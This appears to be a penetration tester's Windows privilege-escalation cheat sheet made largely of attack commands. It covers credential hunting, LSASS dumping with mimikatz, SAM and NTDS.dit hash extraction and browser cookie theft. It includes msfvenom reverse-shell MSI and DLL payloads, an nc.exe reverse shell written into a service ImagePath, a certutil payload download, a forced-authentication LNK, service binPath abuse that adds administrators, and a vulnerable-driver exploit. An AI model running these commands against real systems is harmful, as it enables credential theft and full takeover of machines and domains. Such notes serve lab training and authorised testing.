Windows Privilege Escalation
Windows Privilege Escalation
Initial Enumeration
Searching File & Creds
Searching File
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*where /R C:\ user.txtwhere /R C:\ *.ini
Search only file name:
findstr /SI /M "password" *.xml *.ini *.txt
Search file content CMD:
findstr /si password *.xml *.ini *.txt *.config
Search file content PowerShell
select-string -Path <path>*.txt -Pattern password
Search file extensionCMD
where /R C:\ *.config
Search file extension PowerShell
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Interesting File/Directories
gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Unattend.xml
Sticky notes
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
PowerShell history
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Powershell Command
Get-Credential API
Import-Clixml
`Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Saved Credentials
cmdkey /list
SharpChrome.exe logins /unprotect
Password Manager
Keepass ->
kdbx
->keepass2jhon
->hashcat/jhon
Mail
MailSniper
Lazagne -
lazagne.exe all
-> https://github.com/AlessandroZ/LaZagneSessionGopher -
Import-Module .\SessionGopher.ps1
-Invoke-SessionGopher -Target WINLPE-SRV01
Clear-Text Password in the Registry
Windows Autologon -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
If
1
is enabled
Putty -
Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
Wifi Password
netsh wlan show profile
netsh wlan show profile name="Wifi" key=clear
VHDX/VMDK
Mount Linux
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
`guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Windows
Mount-VHD Mount-VHD
Resources
Misconfiguration
AlwaysInstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit
Import-Module .\PowerUp.ps1
-Write-UserAddMSI
Generating MSI
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
Execute MSI
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
BypassUAC
Bypass-UAC - Bypass-UAC
Share with write permssion
SCF on a File Share
Icon on attacker machine UNC
IconFile=\\10.10.14.3\share\legit.ico
Responder
/Inveigh
/InveighZero
hashcat -m 5600
Malicious
lnk
file - LnkBomb LnkBomb$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Process Monitor
procmon
Network
ipconfig /all
ARP Table
arp -a
Routing table
route print
OS and Process
Info OS -
Get-WmiObject Win32_OperatingSystem | select -Property *
Process
tasklist /svc
Env variables
set
Systeminfo
systeminfo
Patches and Updates
wmic qfe
-Get-HotFix | ft -AutoSize
Installed programs
wmic product get name
-Get-WmiObject -Class Win32_Product | select Name, Version
Running Process
netstat -ano
User and Groups
Logged-In user
query user
Current User
echo %USERNAME
Priv
whoami /priv
Groups Information
whoami /groups
All User
net user
All grous
net localgroup
Detail about a group
net localgroup administrators
Pass policy
net accounts
Local User Description
Get-LocalUser
Computer Description
Get-WmiObject -Class Win32_OperatingSystem | select Description
Enumerating Protection
Windows Defender
Get-MpComputerStatus
AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test AppLocker
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Named Pipe
Pillaging
Installed applications
dir "C:\Program Files"
Using Registry Key
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Installed services
Websites
File Shares
Databases
Directory Services (such as Active Directory, Azure AD, etc.)
Name Servers
Deployment Services
Certificate Authority
Source Code Management Server
Virtualization
Messaging
Monitoring and Logging Systems
Backups
Sensitive Data
Keylogging
Clipboard - Invoke-Clipboard
Screen Capture
Network Traffic Capture
Previous Audit reports
User Information
History files, interesting documents (.doc/x,.xls/x,password./pass., etc)
Roles and Privileges
Web Browsers
Firefox
%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
CookieExtractor CookieExtractor
Chrome
SharpChromium - SharpChromium
Fix copy for Invoke-SharpChromium
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
InvokeSharpChromium - Invoke-SharpChromium
IM Clients
Slack/Teams
Windows User Privileges
SeImpersonate and SeAssignPrimaryToken
SeDebugPrivilege
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
`sekurlsa::logonpasswords'
Exploit SYSTEM from child process
tasklist
(get info aboutwinlogon.exe
)psgetsys.ps1
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe, "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe, "")
SeTakeOwnershipPrivilege
Import-Module .\Enable-Privilege.ps1
\EnableAllTokenPrivs.ps1
Choosing Target File
Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
Checking File Ownership
cmd /c dir /q 'C:\\Department Shares\\Private\\IT'
Take Ownership
takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'
Modify FILE ACL
icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F
Windows Groups Privileges
Backup Operators
Enable Flag https://github.com/giuliano108/SeBackupPrivilege
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
reg save HKLM\\SYSTEM SYSTEM.SAV
reg save hklm\system C:\temp\system.hive
reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Extracting Cred from NTDS.dit
Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
robocopy /B E:\Windows\\NTDS .\ntds ntds.dit
Event Log Readers
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
DnsAdmins
Generate malicious dll
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Get info about group DNSAdmins
Get-ADGroupMember -Identity DnsAdmins
Change dll
dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
Restart DNS Services (could be distruptive)
Get SID user
wmic useraccount where name="netadm" get sid
Check permission on
DNSService
sc.exe sdshow DNS
Hyper-V Administrators
Print Operators - SeLoadDriverPrivilege
whoami /priv
EnableSeLoadDriverPrivilege.cpp
Build
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Add Reference Driver
reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"
EnablePrivilges
EnableSeLoadDriverPrivilege.exe
Verifiy Driver is Loaded
.\DriverView.exe /stext drivers.txt
-cat drivers.txt | Select-String -pattern Capcom
Use ExploitCapcom
.\ExploitCapcom.exe
Use EoPLoadDriver
Clean
reg delete HKCU\\System\\CurrentControlSet\\Capcom
Server Operators
Find Services that run in SYSTEM ad es., AppReadiness
sc qc AppReadiness
Check Permssion with PsService
`c:\Tools\PsService.exe security AppReadiness
Change binPath
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start Service
sc start AppReadiness
User Account Control
Checking if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Checking UAC Level
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking Windows Version
[environment]::OSVersion.Version
Reviewing PATH
cmd /c echo %PATH%
UAC bypass
UACME - UACME
UAC Mocking dir - uac-bypass-by-mocking-trusted-directories
Bypass UAC - Bypass-UAC
Weak Permission
Permissive File System ACLs
Using
Sharphound.exe audit
for searching services modifiable ad es.,SecurityService
Check permission
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Change executable
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Restart Services
sc start SecurityService
Weak Service Permissions
Run
Sharphound.exe audit
Using
accesschk
for reviewing permission about servicesaccesschk.exe /accepteula -quvcw WindscribeService
Change binpath
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
Stop service
sc stop WindscribeService
Restart
sc start WindscribeService
Reverting
sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
sc start WindScribeService
Unquoted Services
Querying service
sc qc SystemExplorerHelpService
Searching unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Permissive Registry ACLs
Checking Weak Service ACLs in Registry
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Changing ImagePath with PowerShell
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
Modifiable Registry Autorun Binary
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
Kernel Exploit
List vuln windows: https://msrc.microsoft.com/update-guide/vulnerability
wmic qfe list brief
Watson: Watson
Wesng: wesng
Vulnerable Services
Enumerate installed programs
wmic product get name
Enumerate local ports
netstat -ano | findstr 6064
Enumerate Process ID
get-process -Id 3324
Enumerate Running Service
get-service | ? {$_.DisplayName -like 'Druva*'}
Modifying PowerShell Execution Policy
Set-ExecutionPolicy Bypass -Scope Process
Process Injection
LOLBAS
Collection
LOLBAS - LOLBAS
Transfer file
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
Encodign File
certutil -encode file1 encodedfile
Decoding file
Certutil -decode encodedfile file2
Execute dll
rundll32.exe
Scheduled Task
Enumerating
schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State
DLL Injection/Hijacking
DLL injection
is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.
Execute an arbitrary DLL inside another process
Locate the process to inject the malicious DLL
CreateToolhelp32Snapshot
,Process32First
,Process32Next
Open the process:
GetModuleHandle
,GetProcAddress
,OpenProcess
Write the path to the DLL inside the process:
VirtualAllocEx
,WriteProcessMemory
Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary
Other functions to use: NTCreateThreadEx, RtlCreateUserThread
LoadLibrary
Manual Mapping
Resources
DLL Injection Hacktips - DLL Injection
IredTeam DLL Injection - IredTeam-DLL Injection
DLL Hijacking
DLL Hijacking
is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying
DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]
Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or
.exe.manifest
/.exe.local
.Ref [Ref.]WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]
Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.
Find Missing DLL
procmon
→filter
→Results contain not Found
and →Paths end with .dll
To escalate privileges
Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
Ensure write access is available for any directory in which the DLL will be searched for
icacls “Path-To-Dir”
Tools
winpeas
powersploit
Find-ProcessDLLHijack
,Find-PathDLLHijack
andWrite-HijackDll
Resources
DLL Hijacking Hacktricks - DLL Hijacking
DLL Hijacking Prives - DLL Hijacking PrivEsc
Hacking dlls in windows - hijacking-dlls-in-windows
tcapt dll hijacking - tcapt-dll-hijacking
DLL Hijacking - DLL Hijacking
DLL Reflective
Resources
Reflective DLL Injection: Reflective DLL Injection
DLL SideLoading
Resources
Dll sideloading proxying dll-sideloading-proxying
`DLL Proxying
Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.
Get RevShell (N.B. is very important arch used)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll
msfconsole
-> usemulti/handler
Write Code
How to compile dll
x64:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
x86:
i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
Link to
Windows Sockets 2
, necessary for rev shelli686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
Alternative use
VisualStudio e C#
How to check DLL
rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
rundll32.exe injection.dll,0
Tools
Procmon
Process Explorer
VisualStudio
Resources
Tools
Last updated